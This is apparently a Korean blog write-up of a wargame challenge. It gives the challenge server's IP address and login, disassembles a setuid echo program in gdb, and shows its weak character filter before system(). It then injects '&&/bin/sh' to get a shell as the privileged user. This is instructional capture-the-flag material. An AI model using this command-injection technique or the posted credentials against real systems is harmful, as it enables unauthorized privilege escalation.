티스토리 뷰
############################################
개발자는 메아리 프로그램을 제작 하였다.
허나 어설픈 보안 설정으로 해당 프로그램의 취약
점이 존재 한다.
취약점을 찾아서 SHELL을 획득 하여라.
접근 IP : 175.119.227.56
접근 PORT : 10222
접근ID : system100
접근 PW : !kisa_system_gogosing~!!!
############################################
일단 서버에 접속하게 되면
-bash-4.1$ ls -l
total 8
-r-sr-x--- 1 root100 system100 7841 Apr 7 2014 system100
system100이라는 파일이 보인다. 실행파일이며 위에서 말하는 메아리 프로그램인거 같다.
-bash-4.1$ ./system100
ECHO Program------------------
INPUT : hello kisa?
hello kisa?
실행을 시켜보면 그냥 단순히 내가 입력한 문자열을 봔환해주는 역할을 한다.
GDB를 통하여 어떠한 동작원리를 가지고 있는지 보도록 하자.
------------------------------------------------------------------------
-bash-4.1$ gdb -q ./system100
/home/system100/.gdbinit:1: Error in sourced command file:
Ambiguous set command "dis intel": disable-randomization, disassemble-next-line, disassembly-flavor, disconnected-tracing...
Reading symbols from /home/system100/system100...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x0000000000400744 <+0>: push rbp
0x0000000000400745 <+1>: mov rbp,rsp
0x0000000000400748 <+4>: push rbx
0x0000000000400749 <+5>: sub rsp,0x1b8
0x0000000000400750 <+12>: mov DWORD PTR [rbp-0x1b4],edi
0x0000000000400756 <+18>: mov QWORD PTR [rbp-0x1c0],rsi
0x000000000040075d <+25>: mov edi,0x400958
0x0000000000400762 <+30>: call 0x4005c8 <puts@plt>
0x0000000000400767 <+35>: mov eax,0x400977
0x000000000040076c <+40>: mov rdi,rax
0x000000000040076f <+43>: mov eax,0x0
0x0000000000400774 <+48>: call 0x4005b8 <printf@plt>
0x0000000000400779 <+53>: mov rax,QWORD PTR [rip+0x2004f8] # 0x600c78 <stdin@@GLIBC_2.2.5>
0x0000000000400780 <+60>: mov rdx,rax
0x0000000000400783 <+63>: lea rax,[rbp-0x80]
0x0000000000400787 <+67>: mov esi,0x64
0x000000000040078c <+72>: mov rdi,rax
0x000000000040078f <+75>: call 0x400608 <fgets@plt>
0x0000000000400794 <+80>: lea rax,[rbp-0x80]
0x0000000000400798 <+84>: mov esi,0x3b
0x000000000040079d <+89>: mov rdi,rax
0x00000000004007a0 <+92>: call 0x400638 <strchr@plt>
0x00000000004007a5 <+97>: test rax,rax
0x00000000004007a8 <+100>: jne 0x4007d6 <main+146>
0x00000000004007aa <+102>: lea rax,[rbp-0x80]
0x00000000004007ae <+106>: mov esi,0x60
0x00000000004007b3 <+111>: mov rdi,rax
0x00000000004007b6 <+114>: call 0x400638 <strchr@plt>
0x00000000004007bb <+119>: test rax,rax
0x00000000004007be <+122>: jne 0x4007d6 <main+146>
0x00000000004007c0 <+124>: lea rax,[rbp-0x80]
0x00000000004007c4 <+128>: mov esi,0x27
0x00000000004007c9 <+133>: mov rdi,rax
0x00000000004007cc <+136>: call 0x400638 <strchr@plt>
0x00000000004007d1 <+141>: test rax,rax
0x00000000004007d4 <+144>: je 0x4007ea <main+166>
0x00000000004007d6 <+146>: mov edi,0x400980
0x00000000004007db <+151>: call 0x4005c8 <puts@plt>
0x00000000004007e0 <+156>: mov edi,0x0
0x00000000004007e5 <+161>: call 0x4005d8 <exit@plt>
0x00000000004007ea <+166>: mov ecx,0x400992
0x00000000004007ef <+171>: lea rdx,[rbp-0x80]
0x00000000004007f3 <+175>: lea rax,[rbp-0x1b0]
---Type <return> to continue, or q <return> to quit---
0x00000000004007fa <+182>: mov rsi,rcx
0x00000000004007fd <+185>: mov rdi,rax
0x0000000000400800 <+188>: mov eax,0x0
0x0000000000400805 <+193>: call 0x400628 <sprintf@plt>
0x000000000040080a <+198>: mov eax,0x0
0x000000000040080f <+203>: call 0x400618 <geteuid@plt>
0x0000000000400814 <+208>: mov ebx,eax
0x0000000000400816 <+210>: mov eax,0x0
0x000000000040081b <+215>: call 0x400618 <geteuid@plt>
0x0000000000400820 <+220>: mov esi,ebx
0x0000000000400822 <+222>: mov edi,eax
0x0000000000400824 <+224>: mov eax,0x0
0x0000000000400829 <+229>: call 0x400648 <setreuid@plt>
0x000000000040082e <+234>: lea rax,[rbp-0x1b0]
0x0000000000400835 <+241>: mov rdi,rax
0x0000000000400838 <+244>: mov eax,0x0
0x000000000040083d <+249>: call 0x4005f8 <system@plt>
0x0000000000400842 <+254>: mov eax,0x0
0x0000000000400847 <+259>: add rsp,0x1b8
0x000000000040084e <+266>: pop rbx
0x000000000040084f <+267>: leave
0x0000000000400850 <+268>: ret
------------------------------------------------------------------------
0x00000000004007a0 <+92>: call 0x400638 <strchr@plt>
0x00000000004007a5 <+97>: test rax,rax
0x00000000004007a8 <+100>: jne 0x4007d6 <main+146>
0x00000000004007aa <+102>: lea rax,[rbp-0x80]
0x00000000004007ae <+106>: mov esi,0x60
0x00000000004007b3 <+111>: mov rdi,rax
0x00000000004007b6 <+114>: call 0x400638 <strchr@plt>
0x00000000004007bb <+119>: test rax,rax
0x00000000004007be <+122>: jne 0x4007d6 <main+146>
0x00000000004007c0 <+124>: lea rax,[rbp-0x80]
0x00000000004007c4 <+128>: mov esi,0x27
0x00000000004007c9 <+133>: mov rdi,rax
0x00000000004007cc <+136>: call 0x400638 <strchr@plt>
여기서 strchr로 0x60, 0x3b, 0x27에 해당하는 단어가 있을시에는 Access Denied!!!! 라는 문자열과 함께 프로그램이 종료 되는데
각각 [ ' ` ; ]이다.
(gdb) r
Starting program: /home/system100/system100
warning: no loadable sections found in added symbol-file system-supplied DSO at 0x7ffff7ffa000
ECHO Program------------------
INPUT : '
Access Denied!!!!
그리고 이부분을 보게 되면 어떠한 문자열이 나오는데 ( 0x400992 부분 )
0x00000000004007ea <+166>: mov ecx,0x400992
(gdb) x/s 0x400992
0x400992 <__dso_handle+66>: "echo %s"
어떠한 문자열에 ( char * ) echo %s (여기서 %s는 내가 입력한 문자열일 것이다.)를 입력하여서
0x000000000040082e <+234>: lea rax,[rbp-0x1b0]
0x0000000000400835 <+241>: mov rdi,rax
0x0000000000400838 <+244>: mov eax,0x0
0x000000000040083d <+249>: call 0x4005f8 <system@plt>
system 함수를 통해 실행시키는 구조인 것 같다.
그렇다면 system함수로 root100의 쉘을 따야 한다는 것이다.
여기서는 한번에 많은 명령어를 실행시켜야 한다 ( 여기서는 echo와 sh가 될 것이다. )
그렇다면 "&&"를 넣어줘서 두개의 명령어를 실행시키도록 하자.
-bash-4.1$ echo asdf && echo qwer
asdf
qwer
( 두개의 명령이 실행되는 것을 알 수 있다. )
-bash-4.1$ ./system100
ECHO Program------------------
INPUT : EXPLOIT&&/bin/sh
EXPLOIT
sh-4.1$ id
uid=502(root100) gid=500(system100) groups=502(root100),500(system100)
sh-4.1$ whoami
root100
sh-4.1$ cat /home/root100/root100_key
??????????????????????????????
클리어 완료!
'Pwnable > KISA SYSTEM' 카테고리의 다른 글
Basic Format String1 (3) | 2014.10.12 |
---|---|
확률 게임에서 이겨라! (0) | 2014.10.12 |